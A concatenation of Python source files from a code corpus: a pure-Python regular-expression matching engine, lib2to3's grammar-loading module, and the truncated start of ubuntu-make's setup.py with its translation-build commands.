if len(grouplist) == 1:
return grouplist[0]
else:
return tuple(grouplist)
def __copy__():
raise TypeError("cannot copy this pattern object")
def __deepcopy__():
raise TypeError("cannot copy this pattern object")
class _State:
def __init__(self, string, start, end, flags):
self.string = string
if start < 0:
start = 0
if end > len(string):
end = len(string)
self.start = start
self.string_position = self.start
self.end = end
self.pos = start
self.flags = flags
self.reset()
def reset(self):
self.marks = []
self.lastindex = -1
self.marks_stack = []
self.context_stack = []
self.repeat = None
def match(self, pattern_codes):
# Optimization: Check string length. pattern_codes[3] contains the
# minimum length for a string to possibly match.
# brython.. the optimization doesn't work
#if pattern_codes[0] == OPCODES["info"] and pattern_codes[3]:
# if self.end - self.string_position < pattern_codes[3]:
# #_log("reject (got %d chars, need %d)"
# # % (self.end - self.string_position, pattern_codes[3]))
# return False
dispatcher = _OpcodeDispatcher()
self.context_stack.append(_MatchContext(self, pattern_codes))
has_matched = None
while len(self.context_stack) > 0:
context = self.context_stack[-1]
has_matched = dispatcher.match(context)
if has_matched is not None: # don't pop if context isn't done
self.context_stack.pop()
return has_matched
def search(self, pattern_codes):
flags = 0
if pattern_codes[0] == OPCODES["info"]:
# optimization info block
# <INFO> <1=skip> <2=flags> <3=min> <4=max> <5=prefix info>
if pattern_codes[2] & SRE_INFO_PREFIX and pattern_codes[5] > 1:
return self.fast_search(pattern_codes)
flags = pattern_codes[2]
pattern_codes = pattern_codes[pattern_codes[1] + 1:]
string_position = self.start
if pattern_codes[0] == OPCODES["literal"]:
# Special case: Pattern starts with a literal character. This is
# used for short prefixes
character = pattern_codes[1]
while True:
while string_position < self.end \
and ord(self.string[string_position]) != character:
string_position += 1
if string_position >= self.end:
return False
self.start = string_position
string_position += 1
self.string_position = string_position
if flags & SRE_INFO_LITERAL:
return True
if self.match(pattern_codes[2:]):
return True
return False
# General case
while string_position <= self.end:
self.reset()
self.start = self.string_position = string_position
if self.match(pattern_codes):
return True
string_position += 1
return False
def fast_search(self, pattern_codes):
"""Skips forward in a string as fast as possible using information from
an optimization info block."""
# pattern starts with a known prefix
# <5=length> <6=skip> <7=prefix data> <overlap data>
flags = pattern_codes[2]
prefix_len = pattern_codes[5]
prefix_skip = pattern_codes[6] # don't really know what this is good for
prefix = pattern_codes[7:7 + prefix_len]
overlap = pattern_codes[7 + prefix_len - 1:pattern_codes[1] + 1]
pattern_codes = pattern_codes[pattern_codes[1] + 1:]
i = 0
string_position = self.string_position
while string_position < self.end:
while True:
if ord(self.string[string_position]) != prefix[i]:
if i == 0:
break
else:
i = overlap[i]
else:
i += 1
if i == prefix_len:
# found a potential match
self.start = string_position + 1 - prefix_len
self.string_position = string_position + 1 \
- prefix_len + prefix_skip
if flags & SRE_INFO_LITERAL:
return True # matched all of pure literal pattern
if self.match(pattern_codes[2 * prefix_skip:]):
return True
i = overlap[i]
break
string_position += 1
return False
def set_mark(self, mark_nr, position):
if mark_nr & 1:
# This id marks the end of a group.
# fix python 3 division incompatability
#self.lastindex = mark_nr / 2 + 1
self.lastindex = mark_nr // 2 + 1
if mark_nr >= len(self.marks):
self.marks.extend([None] * (mark_nr - len(self.marks) + 1))
self.marks[mark_nr] = position
def get_marks(self, group_index):
marks_index = 2 * group_index
if len(self.marks) > marks_index + 1:
return self.marks[marks_index], self.marks[marks_index + 1]
else:
return None, None
def marks_push(self):
self.marks_stack.append((self.marks[:], self.lastindex))
def marks_pop(self):
self.marks, self.lastindex = self.marks_stack.pop()
def marks_pop_keep(self):
self.marks, self.lastindex = self.marks_stack[-1]
def marks_pop_discard(self):
self.marks_stack.pop()
def lower(self, char_ord):
return getlower(char_ord, self.flags)
class _MatchContext:
def __init__(self, state, pattern_codes):
self.state = state
self.pattern_codes = pattern_codes
self.string_position = state.string_position
self.code_position = 0
self.has_matched = None
def push_new_context(self, pattern_offset):
"""Creates a new child context of this context and pushes it on the
stack. pattern_offset is the offset off the current code position to
start interpreting from."""
child_context = _MatchContext(self.state,
self.pattern_codes[self.code_position + pattern_offset:])
#print("_sre.py:517:pushing new context") #, child_context.has_matched)
#print(self.state.string_position)
#print(self.pattern_codes[self.code_position + pattern_offset:])
#print(pattern_offset)
self.state.context_stack.append(child_context)
return child_context
def peek_char(self, peek=0):
return self.state.string[self.string_position + peek]
def skip_char(self, skip_count):
self.string_position += skip_count
def remaining_chars(self):
return self.state.end - self.string_position
def peek_code(self, peek=0):
return self.pattern_codes[self.code_position + peek]
def skip_code(self, skip_count):
self.code_position += skip_count
def remaining_codes(self):
return len(self.pattern_codes) - self.code_position
def at_beginning(self):
return self.string_position == 0
def at_end(self):
return self.string_position == self.state.end
def at_linebreak(self):
return not self.at_end() and _is_linebreak(self.peek_char())
def at_boundary(self, word_checker):
if self.at_beginning() and self.at_end():
return False
that = not self.at_beginning() and word_checker(self.peek_char(-1))
this = not self.at_end() and word_checker(self.peek_char())
return this != that
class _RepeatContext(_MatchContext):
def __init__(self, context):
_MatchContext.__init__(self, context.state,
context.pattern_codes[context.code_position:])
self.count = -1
#print('569:repeat', context.state.repeat)
self.previous = context.state.repeat
self.last_position = None
class _Dispatcher:
DISPATCH_TABLE = None
def dispatch(self, code, context):
method = self.DISPATCH_TABLE.get(code, self.__class__.unknown)
return method(self, context)
def unknown(self, code, ctx):
raise NotImplementedError()
def build_dispatch_table(cls, code_dict, method_prefix):
if cls.DISPATCH_TABLE is not None:
return
table = {}
for key, value in code_dict.items():
if hasattr(cls, "%s%s" % (method_prefix, key)):
table[value] = getattr(cls, "%s%s" % (method_prefix, key))
cls.DISPATCH_TABLE = table
build_dispatch_table = classmethod(build_dispatch_table)
class _OpcodeDispatcher(_Dispatcher):
def __init__(self):
self.executing_contexts = {}
self.at_dispatcher = _AtcodeDispatcher()
self.ch_dispatcher = _ChcodeDispatcher()
self.set_dispatcher = _CharsetDispatcher()
def match(self, context):
"""Returns True if the current context matches, False if it doesn't and
None if matching is not finished, ie must be resumed after child
contexts have been matched."""
while context.remaining_codes() > 0 and context.has_matched is None:
opcode = context.peek_code()
if not self.dispatch(opcode, context):
return None
if context.has_matched is None:
context.has_matched = False
return context.has_matched
def dispatch(self, opcode, context):
"""Dispatches a context on a given opcode. Returns True if the context
is done matching, False if it must be resumed when next encountered."""
#if self.executing_contexts.has_key(id(context)):
if id(context) in self.executing_contexts:
generator = self.executing_contexts[id(context)]
del self.executing_contexts[id(context)]
has_finished = next(generator)
else:
method = self.DISPATCH_TABLE.get(opcode, _OpcodeDispatcher.unknown)
has_finished = method(self, context)
if hasattr(has_finished, "__next__"): # avoid using the types module
generator = has_finished
has_finished = next(generator)
if not has_finished:
self.executing_contexts[id(context)] = generator
return has_finished
def op_success(self, ctx):
# end of pattern
#self._log(ctx, "SUCCESS")
ctx.state.string_position = ctx.string_position
ctx.has_matched = True
return True
def op_failure(self, ctx):
# immediate failure
#self._log(ctx, "FAILURE")
ctx.has_matched = False
return True
def general_op_literal(self, ctx, compare, decorate=lambda x: x):
#print(ctx.peek_char())
if ctx.at_end() or not compare(decorate(ord(ctx.peek_char())),
decorate(ctx.peek_code(1))):
ctx.has_matched = False
ctx.skip_code(2)
ctx.skip_char(1)
def op_literal(self, ctx):
# match literal string
# <LITERAL> <code>
#self._log(ctx, "LITERAL", ctx.peek_code(1))
self.general_op_literal(ctx, operator.eq)
return True
def op_not_literal(self, ctx):
# match anything that is not the given literal character
# <NOT_LITERAL> <code>
#self._log(ctx, "NOT_LITERAL", ctx.peek_code(1))
self.general_op_literal(ctx, operator.ne)
return True
def op_literal_ignore(self, ctx):
# match literal regardless of case
# <LITERAL_IGNORE> <code>
#self._log(ctx, "LITERAL_IGNORE", ctx.peek_code(1))
self.general_op_literal(ctx, operator.eq, ctx.state.lower)
return True
def op_not_literal_ignore(self, ctx):
# match literal regardless of case
# <LITERAL_IGNORE> <code>
#self._log(ctx, "LITERAL_IGNORE", ctx.peek_code(1))
self.general_op_literal(ctx, operator.ne, ctx.state.lower)
return True
def op_at(self, ctx):
# match at given position
# <AT> <code>
#self._log(ctx, "AT", ctx.peek_code(1))
if not self.at_dispatcher.dispatch(ctx.peek_code(1), ctx):
ctx.has_matched = False
#print('_sre.py:line693, update context.has_matched variable')
return True
ctx.skip_code(2)
return True
def op_category(self, ctx):
# match at given category
# <CATEGORY> <code>
#self._log(ctx, "CATEGORY", ctx.peek_code(1))
if ctx.at_end() or not self.ch_dispatcher.dispatch(ctx.peek_code(1), ctx):
ctx.has_matched = False
#print('_sre.py:line703, update context.has_matched variable')
return True
ctx.skip_code(2)
ctx.skip_char(1)
return True
def op_any(self, ctx):
# match anything (except a newline)
# <ANY>
#self._log(ctx, "ANY")
if ctx.at_end() or ctx.at_linebreak():
ctx.has_matched = False
#print('_sre.py:line714, update context.has_matched variable')
return True
ctx.skip_code(1)
ctx.skip_char(1)
return True
def op_any_all(self, ctx):
# match anything
# <ANY_ALL>
#self._log(ctx, "ANY_ALL")
if ctx.at_end():
ctx.has_matched = False
#print('_sre.py:line725, update context.has_matched variable')
return True
ctx.skip_code(1)
ctx.skip_char(1)
return True
def general_op_in(self, ctx, decorate=lambda x: x):
#self._log(ctx, "OP_IN")
#print('general_op_in')
if ctx.at_end():
ctx.has_matched = False
#print('_sre.py:line734, update context.has_matched variable')
return
skip = ctx.peek_code(1)
ctx.skip_code(2) # set op pointer to the set code
#print(ctx.peek_char(), ord(ctx.peek_char()),
# decorate(ord(ctx.peek_char())))
if not self.check_charset(ctx, decorate(ord(ctx.peek_char()))):
#print('_sre.py:line738, update context.has_matched variable')
ctx.has_matched = False
return
ctx.skip_code(skip - 1)
ctx.skip_char(1)
#print('end:general_op_in')
def op_in(self, ctx):
# match set member (or non_member)
# <IN> <skip> <set>
#self._log(ctx, "OP_IN")
self.general_op_in(ctx)
return True
def op_in_ignore(self, ctx):
# match set member (or non_member), disregarding case of current char
# <IN_IGNORE> <skip> <set>
#self._log(ctx, "OP_IN_IGNORE")
self.general_op_in(ctx, ctx.state.lower)
return True
def op_jump(self, ctx):
# jump forward
# <JUMP> <offset>
#self._log(ctx, "JUMP", ctx.peek_code(1))
ctx.skip_code(ctx.peek_code(1) + 1)
return True
# skip info
# <INFO> <skip>
op_info = op_jump
def op_mark(self, ctx):
# set mark
# <MARK> <gid>
#self._log(ctx, "OP_MARK", ctx.peek_code(1))
ctx.state.set_mark(ctx.peek_code(1), ctx.string_position)
ctx.skip_code(2)
return True
def op_branch(self, ctx):
# alternation
# <BRANCH> <0=skip> code <JUMP> ... <NULL>
#self._log(ctx, "BRANCH")
ctx.state.marks_push()
ctx.skip_code(1)
current_branch_length = ctx.peek_code(0)
while current_branch_length:
# The following tries to shortcut branches starting with a
# (unmatched) literal. _sre.c also shortcuts charsets here.
if not (ctx.peek_code(1) == OPCODES["literal"] and \
(ctx.at_end() or ctx.peek_code(2) != ord(ctx.peek_char()))):
ctx.state.string_position = ctx.string_position
child_context = ctx.push_new_context(1)
#print("_sre.py:803:op_branch")
yield False
if child_context.has_matched:
ctx.has_matched = True
yield True
ctx.state.marks_pop_keep()
ctx.skip_code(current_branch_length)
current_branch_length = ctx.peek_code(0)
ctx.state.marks_pop_discard()
ctx.has_matched = False
#print('_sre.py:line805, update context.has_matched variable')
yield True
def op_repeat_one(self, ctx):
# match repeated sequence (maximizing).
# this operator only works if the repeated item is exactly one character
# wide, and we're not already collecting backtracking points.
# <REPEAT_ONE> <skip> <1=min> <2=max> item <SUCCESS> tail
mincount = ctx.peek_code(2)
maxcount = ctx.peek_code(3)
#print("repeat one", mincount, maxcount)
#self._log(ctx, "REPEAT_ONE", mincount, maxcount)
if ctx.remaining_chars() < mincount:
ctx.has_matched = False
yield True
ctx.state.string_position = ctx.string_position
count = self.count_repetitions(ctx, maxcount)
ctx.skip_char(count)
if count < mincount:
ctx.has_matched = False
yield True
if ctx.peek_code(ctx.peek_code(1) + 1) == OPCODES["success"]:
# tail is empty. we're finished
ctx.state.string_position = ctx.string_position
ctx.has_matched = True
yield True
ctx.state.marks_push()
if ctx.peek_code(ctx.peek_code(1) + 1) == OPCODES["literal"]:
# Special case: Tail starts with a literal. Skip positions where
# the rest of the pattern cannot possibly match.
char = ctx.peek_code(ctx.peek_code(1) + 2)
while True:
while count >= mincount and \
(ctx.at_end() or ord(ctx.peek_char()) != char):
ctx.skip_char(-1)
count -= 1
if count < mincount:
break
ctx.state.string_position = ctx.string_position
child_context = ctx.push_new_context(ctx.peek_code(1) + 1)
#print("_sre.py:856:push_new_context")
yield False
if child_context.has_matched:
ctx.has_matched = True
yield True
ctx.skip_char(-1)
count -= 1
ctx.state.marks_pop_keep()
else:
# General case: backtracking
while count >= mincount:
ctx.state.string_position = ctx.string_position
child_context = ctx.push_new_context(ctx.peek_code(1) + 1)
yield False
if child_context.has_matched:
ctx.has_matched = True
yield True
ctx.skip_char(-1)
count -= 1
ctx.state.marks_pop_keep()
ctx.state.marks_pop_discard()
ctx.has_matched = False
#ctx.has_matched = True # <== this should be True (so match object gets returned to program)
yield True
def op_min_repeat_one(self, ctx):
# match repeated sequence (minimizing)
# <MIN_REPEAT_ONE> <skip> <1=min> <2=max> item <SUCCESS> tail
mincount = ctx.peek_code(2)
maxcount = ctx.peek_code(3)
#self._log(ctx, "MIN_REPEAT_ONE", mincount, maxcount)
if ctx.remaining_chars() < mincount:
ctx.has_matched = False
yield True
ctx.state.string_position = ctx.string_position
if mincount == 0:
count = 0
else:
count = self.count_repetitions(ctx, mincount)
if count < mincount:
ctx.has_matched = False
#print('_sre.py:line891, update context.has_matched variable')
yield True
ctx.skip_char(count)
if ctx.peek_code(ctx.peek_code(1) + 1) == OPCODES["success"]:
# tail is empty. we're finished
ctx.state.string_position = ctx.string_position
ctx.has_matched = True
yield True
ctx.state.marks_push()
while maxcount == MAXREPEAT or count <= maxcount:
ctx.state.string_position = ctx.string_position
child_context = ctx.push_new_context(ctx.peek_code(1) + 1)
#print('_sre.py:916:push new context')
yield False
if child_context.has_matched:
ctx.has_matched = True
yield True
ctx.state.string_position = ctx.string_position
if self.count_repetitions(ctx, 1) == 0:
break
ctx.skip_char(1)
count += 1
ctx.state.marks_pop_keep()
ctx.state.marks_pop_discard()
ctx.has_matched = False
yield True
def op_repeat(self, ctx):
# create repeat context. all the hard work is done by the UNTIL
# operator (MAX_UNTIL, MIN_UNTIL)
# <REPEAT> <skip> <1=min> <2=max> item <UNTIL> tail
#self._log(ctx, "REPEAT", ctx.peek_code(2), ctx.peek_code(3))
#if ctx.state.repeat is None:
# print("951:ctx.state.repeat is None")
# #ctx.state.repeat=_RepeatContext(ctx)
repeat = _RepeatContext(ctx)
ctx.state.repeat = repeat
ctx.state.string_position = ctx.string_position
child_context = ctx.push_new_context(ctx.peek_code(1) + 1)
#print("_sre.py:941:push new context", id(child_context))
#print(child_context.state.repeat)
#print(ctx.state.repeat)
# are these two yields causing the issue?
yield False
ctx.state.repeat = repeat.previous
ctx.has_matched = child_context.has_matched
yield True
def op_max_until(self, ctx):
# maximizing repeat
# <REPEAT> <skip> <1=min> <2=max> item <MAX_UNTIL> tail
repeat = ctx.state.repeat
#print("op_max_until") #, id(ctx.state.repeat))
if repeat is None:
#print(id(ctx), id(ctx.state))
raise RuntimeError("Internal re error: MAX_UNTIL without REPEAT.")
mincount = repeat.peek_code(2)
maxcount = repeat.peek_code(3)
ctx.state.string_position = ctx.string_position
count = repeat.count + 1
#self._log(ctx, "MAX_UNTIL", count)
if count < mincount:
# not enough matches
repeat.count = count
child_context = repeat.push_new_context(4)
yield False
ctx.has_matched = child_context.has_matched
if not ctx.has_matched:
repeat.count = count - 1
ctx.state.string_position = ctx.string_position
yield True
if (count < maxcount or maxcount == MAXREPEAT) \
and ctx.state.string_position != repeat.last_position:
# we may have enough matches, if we can match another item, do so
repeat.count = count
ctx.state.marks_push()
save_last_position = repeat.last_position # zero-width match protection
repeat.last_position = ctx.state.string_position
child_context = repeat.push_new_context(4)
yield False
repeat.last_position = save_last_position
if child_context.has_matched:
ctx.state.marks_pop_discard()
ctx.has_matched = True
yield True
ctx.state.marks_pop()
repeat.count = count - 1
ctx.state.string_position = ctx.string_position
# cannot match more repeated items here. make sure the tail matches
ctx.state.repeat = repeat.previous
child_context = ctx.push_new_context(1)
#print("_sre.py:987:op_max_until")
yield False
ctx.has_matched = child_context.has_matched
if not ctx.has_matched:
ctx.state.repeat = repeat
ctx.state.string_position = ctx.string_position
yield True
def op_min_until(self, ctx):
# minimizing repeat
# <REPEAT> <skip> <1=min> <2=max> item <MIN_UNTIL> tail
repeat = ctx.state.repeat
if repeat is None:
raise RuntimeError("Internal re error: MIN_UNTIL without REPEAT.")
mincount = repeat.peek_code(2)
maxcount = repeat.peek_code(3)
ctx.state.string_position = ctx.string_position
count = repeat.count + 1
#self._log(ctx, "MIN_UNTIL", count)
if count < mincount:
# not enough matches
repeat.count = count
child_context = repeat.push_new_context(4)
yield False
ctx.has_matched = child_context.has_matched
if not ctx.has_matched:
repeat.count = count - 1
ctx.state.string_position = ctx.string_position
yield True
# see if the tail matches
ctx.state.marks_push()
ctx.state.repeat = repeat.previous
child_context = ctx.push_new_context(1)
#print('_sre.py:1022:push new context')
yield False
if child_context.has_matched:
ctx.has_matched = True
yield True
ctx.state.repeat = repeat
ctx.state.string_position = ctx.string_position
ctx.state.marks_pop()
# match more until tail matches
if count >= maxcount and maxcount != MAXREPEAT:
ctx.has_matched = False
#print('_sre.py:line1022, update context.has_matched variable')
yield True
repeat.count = count
child_context = repeat.push_new_context(4)
yield False
ctx.has_matched = child_context.has_matched
if not ctx.has_matched:
repeat.count = count - 1
ctx.state.string_position = ctx.string_position
yield True
def general_op_groupref(self, ctx, decorate=lambda x: x):
group_start, group_end = ctx.state.get_marks(ctx.peek_code(1))
if group_start is None or group_end is None or group_end < group_start:
ctx.has_matched = False
return True
while group_start < group_end:
if ctx.at_end() or decorate(ord(ctx.peek_char())) \
!= decorate(ord(ctx.state.string[group_start])):
ctx.has_matched = False
#print('_sre.py:line1042, update context.has_matched variable')
return True
group_start += 1
ctx.skip_char(1)
ctx.skip_code(2)
return True
def op_groupref(self, ctx):
# match backreference
# <GROUPREF> <zero-based group index>
#self._log(ctx, "GROUPREF", ctx.peek_code(1))
return self.general_op_groupref(ctx)
def op_groupref_ignore(self, ctx):
# match backreference case-insensitive
# <GROUPREF_IGNORE> <zero-based group index>
#self._log(ctx, "GROUPREF_IGNORE", ctx.peek_code(1))
return self.general_op_groupref(ctx, ctx.state.lower)
def op_groupref_exists(self, ctx):
# <GROUPREF_EXISTS> <group> <skip> codeyes <JUMP> codeno ...
#self._log(ctx, "GROUPREF_EXISTS", ctx.peek_code(1))
group_start, group_end = ctx.state.get_marks(ctx.peek_code(1))
if group_start is None or group_end is None or group_end < group_start:
ctx.skip_code(ctx.peek_code(2) + 1)
else:
ctx.skip_code(3)
return True
def op_assert(self, ctx):
# assert subpattern
# <ASSERT> <skip> <back> <pattern>
#self._log(ctx, "ASSERT", ctx.peek_code(2))
ctx.state.string_position = ctx.string_position - ctx.peek_code(2)
if ctx.state.string_position < 0:
ctx.has_matched = False
yield True
child_context = ctx.push_new_context(3)
yield False
if child_context.has_matched:
ctx.skip_code(ctx.peek_code(1) + 1)
else:
ctx.has_matched = False
yield True
def op_assert_not(self, ctx):
# assert not subpattern
# <ASSERT_NOT> <skip> <back> <pattern>
#self._log(ctx, "ASSERT_NOT", ctx.peek_code(2))
ctx.state.string_position = ctx.string_position - ctx.peek_code(2)
if ctx.state.string_position >= 0:
child_context = ctx.push_new_context(3)
yield False
if child_context.has_matched:
ctx.has_matched = False
yield True
ctx.skip_code(ctx.peek_code(1) + 1)
yield True
def unknown(self, ctx):
#self._log(ctx, "UNKNOWN", ctx.peek_code())
raise RuntimeError("Internal re error. Unknown opcode: %s" % ctx.peek_code())
def check_charset(self, ctx, char):
"""Checks whether a character matches set of arbitrary length. Assumes
the code pointer is at the first member of the set."""
self.set_dispatcher.reset(char)
save_position = ctx.code_position
result = None
while result is None:
result = self.set_dispatcher.dispatch(ctx.peek_code(), ctx)
ctx.code_position = save_position
#print("_sre.py:1123:check_charset", result)
return result
def count_repetitions(self, ctx, maxcount):
"""Returns the number of repetitions of a single item, starting from the
current string position. The code pointer is expected to point to a
REPEAT_ONE operation (with the repeated 4 ahead)."""
count = 0
real_maxcount = ctx.state.end - ctx.string_position
if maxcount < real_maxcount and maxcount != MAXREPEAT:
real_maxcount = maxcount
# XXX could special case every single character pattern here, as in C.
# This is a general solution, a bit hackisch, but works and should be
# efficient.
code_position = ctx.code_position
string_position = ctx.string_position
ctx.skip_code(4)
reset_position = ctx.code_position
while count < real_maxcount:
# this works because the single character pattern is followed by
# a success opcode
ctx.code_position = reset_position
self.dispatch(ctx.peek_code(), ctx)
#print("count_repetitions", ctx.has_matched, count)
if ctx.has_matched is False: # could be None as well
break
count += 1
ctx.has_matched = None
ctx.code_position = code_position
ctx.string_position = string_position
return count
def _log(self, context, opname, *args):
arg_string = ("%s " * len(args)) % args
_log("|%s|%s|%s %s" % (context.pattern_codes,
context.string_position, opname, arg_string))
_OpcodeDispatcher.build_dispatch_table(OPCODES, "op_")
class _CharsetDispatcher(_Dispatcher):
def __init__(self):
self.ch_dispatcher = _ChcodeDispatcher()
def reset(self, char):
self.char = char
self.ok = True
def set_failure(self, ctx):
return not self.ok
def set_literal(self, ctx):
# <LITERAL> <code>
if ctx.peek_code(1) == self.char:
return self.ok
else:
ctx.skip_code(2)
def set_category(self, ctx):
# <CATEGORY> <code>
if self.ch_dispatcher.dispatch(ctx.peek_code(1), ctx):
return self.ok
else:
ctx.skip_code(2)
def set_charset(self, ctx):
# <CHARSET> <bitmap> (16 bits per code word)
char_code = self.char
ctx.skip_code(1) # point to beginning of bitmap
if CODESIZE == 2:
if char_code < 256 and ctx.peek_code(char_code >> 4) \
& (1 << (char_code & 15)):
return self.ok
ctx.skip_code(16) # skip bitmap
else:
if char_code < 256 and ctx.peek_code(char_code >> 5) \
& (1 << (char_code & 31)):
return self.ok
ctx.skip_code(8) # skip bitmap
def set_range(self, ctx):
# <RANGE> <lower> <upper>
if ctx.peek_code(1) <= self.char <= ctx.peek_code(2):
return self.ok
ctx.skip_code(3)
def set_negate(self, ctx):
self.ok = not self.ok
ctx.skip_code(1)
#fixme brython. array module doesn't exist
def set_bigcharset(self, ctx):
raise NotImplementationError("_sre.py: set_bigcharset, array not implemented")
# <BIGCHARSET> <blockcount> <256 blockindices> <blocks>
char_code = self.char
count = ctx.peek_code(1)
ctx.skip_code(2)
if char_code < 65536:
block_index = char_code >> 8
# NB: there are CODESIZE block indices per bytecode
a = array.array("B")
a.fromstring(array.array(CODESIZE == 2 and "H" or "I",
[ctx.peek_code(block_index // CODESIZE)]).tostring())
block = a[block_index % CODESIZE]
ctx.skip_code(256 // CODESIZE) # skip block indices
block_value = ctx.peek_code(block * (32 // CODESIZE)
+ ((char_code & 255) >> (CODESIZE == 2 and 4 or 5)))
if block_value & (1 << (char_code & ((8 * CODESIZE) - 1))):
return self.ok
else:
ctx.skip_code(256 // CODESIZE) # skip block indices
ctx.skip_code(count * (32 // CODESIZE)) # skip blocks
def unknown(self, ctx):
return False
_CharsetDispatcher.build_dispatch_table(OPCODES, "set_")
class _AtcodeDispatcher(_Dispatcher):
def at_beginning(self, ctx):
return ctx.at_beginning()
at_beginning_string = at_beginning
def at_beginning_line(self, ctx):
return ctx.at_beginning() or _is_linebreak(ctx.peek_char(-1))
def at_end(self, ctx):
return (ctx.remaining_chars() == 1 and ctx.at_linebreak()) or ctx.at_end()
def at_end_line(self, ctx):
return ctx.at_linebreak() or ctx.at_end()
def at_end_string(self, ctx):
return ctx.at_end()
def at_boundary(self, ctx):
return ctx.at_boundary(_is_word)
def at_non_boundary(self, ctx):
return not ctx.at_boundary(_is_word)
def at_loc_boundary(self, ctx):
return ctx.at_boundary(_is_loc_word)
def at_loc_non_boundary(self, ctx):
return not ctx.at_boundary(_is_loc_word)
def at_uni_boundary(self, ctx):
return ctx.at_boundary(_is_uni_word)
def at_uni_non_boundary(self, ctx):
return not ctx.at_boundary(_is_uni_word)
def unknown(self, ctx):
return False
_AtcodeDispatcher.build_dispatch_table(ATCODES, "")
class _ChcodeDispatcher(_Dispatcher):
def category_digit(self, ctx):
return _is_digit(ctx.peek_char())
def category_not_digit(self, ctx):
return not _is_digit(ctx.peek_char())
def category_space(self, ctx):
return _is_space(ctx.peek_char())
def category_not_space(self, ctx):
return not _is_space(ctx.peek_char())
def category_word(self, ctx):
return _is_word(ctx.peek_char())
def category_not_word(self, ctx):
return not _is_word(ctx.peek_char())
def category_linebreak(self, ctx):
return _is_linebreak(ctx.peek_char())
def category_not_linebreak(self, ctx):
return not _is_linebreak(ctx.peek_char())
def category_loc_word(self, ctx):
return _is_loc_word(ctx.peek_char())
def category_loc_not_word(self, ctx):
return not _is_loc_word(ctx.peek_char())
def category_uni_digit(self, ctx):
return ctx.peek_char().isdigit()
def category_uni_not_digit(self, ctx):
return not ctx.peek_char().isdigit()
def category_uni_space(self, ctx):
return ctx.peek_char().isspace()
def category_uni_not_space(self, ctx):
return not ctx.peek_char().isspace()
def category_uni_word(self, ctx):
return _is_uni_word(ctx.peek_char())
def category_uni_not_word(self, ctx):
return not _is_uni_word(ctx.peek_char())
def category_uni_linebreak(self, ctx):
return ord(ctx.peek_char()) in _uni_linebreaks
def category_uni_not_linebreak(self, ctx):
return ord(ctx.peek_char()) not in _uni_linebreaks
def unknown(self, ctx):
return False
_ChcodeDispatcher.build_dispatch_table(CHCODES, "")
_ascii_char_info = [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 6, 2,
2, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 25, 25, 25, 25, 25, 25, 25, 25,
25, 25, 0, 0, 0, 0, 0, 0, 0, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24,
24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 0, 0,
0, 0, 16, 0, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24,
24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 0, 0, 0, 0, 0 ]
def _is_digit(char):
code = ord(char)
return code < 128 and _ascii_char_info[code] & 1
def _is_space(char):
code = ord(char)
return code < 128 and _ascii_char_info[code] & 2
def _is_word(char):
# NB: non-ASCII chars aren't words according to _sre.c
code = ord(char)
return code < 128 and _ascii_char_info[code] & 16
def _is_loc_word(char):
return (not (ord(char) & ~255) and char.isalnum()) or char == '_'
def _is_uni_word(char):
# not valid in python 3
#return unichr(ord(char)).isalnum() or char == '_'
return chr(ord(char)).isalnum() or char == '_'
def _is_linebreak(char):
return char == "\n"
# Static list of all unicode codepoints reported by Py_UNICODE_ISLINEBREAK.
_uni_linebreaks = [10, 13, 28, 29, 30, 133, 8232, 8233]
def _log(message):
if 0:
print(message)
| gpl-3.0 |
MalloyPower/parsing-python | front-end/testsuite-python-lib/Python-3.3.0/Lib/lib2to3/pygram.py | 170 | 1114 | # Copyright 2006 Google, Inc. All Rights Reserved.
# Licensed to PSF under a Contributor Agreement.
"""Export the Python grammar and symbols."""
# Python imports
import os
# Local imports
from .pgen2 import token
from .pgen2 import driver
from . import pytree
# The grammar file
_GRAMMAR_FILE = os.path.join(os.path.dirname(__file__), "Grammar.txt")
_PATTERN_GRAMMAR_FILE = os.path.join(os.path.dirname(__file__),
"PatternGrammar.txt")
class Symbols(object):
def __init__(self, grammar):
"""Initializer.
Creates an attribute for each grammar symbol (nonterminal),
whose value is the symbol's type (an int >= 256).
"""
for name, symbol in grammar.symbol2number.items():
setattr(self, name, symbol)
python_grammar = driver.load_grammar(_GRAMMAR_FILE)
python_symbols = Symbols(python_grammar)
python_grammar_no_print_statement = python_grammar.copy()
del python_grammar_no_print_statement.keywords["print"]
pattern_grammar = driver.load_grammar(_PATTERN_GRAMMAR_FILE)
pattern_symbols = Symbols(pattern_grammar)
| mit |
jravetch/ubuntu-make | setup.py | 6 | 5396 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright (C) 2014 Canonical
#
# Authors:
# Didier Roche
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation; version 3.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
from distutils import cmd
from distutils.command.install_data import install_data as _install_data
from distutils.command.build import build as _build
import gettext
from glob import glob
import os
from setuptools import setup, find_packages
import subprocess
import umake # that initializes the gettext domain
from umake.settings import get_version
I18N_DOMAIN = gettext.textdomain()
PO_DIR = os.path.join(os.path.dirname(os.curdir), 'po')
def get_requirements(tag_to_detect=""):
"""Gather a list of requirements line per line from tag_to_detect to next tag.
if tag_to_detect is empty, it will gather every requirement"""
requirements = []
tag_detected = False
with open("requirements.txt") as f:
for line in f.read().splitlines():
if line.startswith("#") or line == "":
tag_detected = False
if line.startswith(tag_to_detect):
tag_detected = True
continue
if tag_detected:
requirements.append(line)
print(requirements)
return requirements
#
# add translation support
#
class build(_build):
sub_commands = _build.sub_commands + [('build_trans', None)]
def run(self):
_build.run(self)
class build_trans(cmd.Command):
description = 'Compile .po files into .mo files'
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
for filename in os.listdir(PO_DIR):
if not filename.endswith('.po'):
continue
